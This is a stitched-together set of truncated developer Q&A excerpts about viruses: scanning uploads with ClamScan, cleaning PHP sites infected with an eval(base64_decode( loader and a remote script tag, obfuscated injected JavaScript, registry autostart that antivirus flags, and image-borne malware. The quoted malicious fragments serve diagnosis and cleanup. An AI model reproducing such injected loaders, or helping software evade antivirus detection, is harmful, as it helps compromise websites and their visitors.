virus

I'm currently using the following code to scan files that have been uploaded as part of an application form: $safe_path = escapeshellarg($dir . $file); $command = '/usr/bin/clamscan --stdout ' . $safe_path; $out = ''; $int = -1; exec($command, $out, $int); if ($int == 0) { // all good; } else { // VIRUS!; } It works, but is slow. Anyone got any suggestions that would a). speed things up and b). improve the script generally (for instance, I'm not entirely clear on the benefits of exec() vs system(), etc)? If the speed can't be improved then I'd ideally like to display some kind of interim

I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output <script src="http://holasionweb.com/oo.php"></script> This is the code of virus <?php /**/ eval(base64_decode(

BE AWARE! Creating spyware, computer viruses and similar nasties can be illegal where you live and is considered extremely unethical by almost everyone. Still, I need to ask this to raise awareness about how easy it is to create one. I am asking this after the W32/Induc-A was introduced to this world by someone who came up with a nasty way to spread one. So I want to know how a virus can be created so I will be able to recognise them in the future! Recently a new virus was discovered which spreads itself by replacing the developers' copies of library code. Actually, through the source code of

The problem: On my webspace there are PHP files which all end with this: <?php include 'footer.php'; ?> Before this line, there is also HTML code in the files. The output in the browser ends with this, of course: </body> </html> But yesterday, there was some malicious code at the end, suddenly. The output of my index.php was: </body> </html><body><script> var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64

I make an application that, when you run it, will put the .exe in Startup. I have this code for that: RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); rkApp.SetValue("smartAppointment", Application.ExecutablePath.ToString()); Will creat a registery for the application to start with the Windows, but there is a problem, some antivirus will detect my application as a virus. How I can stop the antivirus to detect my application as a virus ? I think any way of having an application automatically attempt to run at startup will be flagged

Hello StackOverflow community. I have a very interesting (at my opinion) infection to share with you today. 4-5 days ago I realized that my blog's homepage after some seconds of loading was redirected to another page. Specifically to youtube, at a Justin Bieber video. I thought it was my computer's problem, so I scanned or viruses and malware. But it wasn't my fault. Finally I was sure that it was not a local problem because Google pagespeed insights had the same result. So, after many hours of research (and some broken keyboards) I found out those clues. In details: A meta tag was created

I have recently watched this video of a Finnish internet security expert. Somewhere around eleventh minute, he talks about a virus which is hidden in an image and executes when the image is about to be displayed. I am wondering how do they technically do such a thing, I mean how come the virus is executed , when the picture should be displayed and how come the picture is not compromised in some way. I thought the computer first looks at the extension, then opens it with appropriate program and lets the program work itself (and I don't expect regular image viewer to be able to run a virus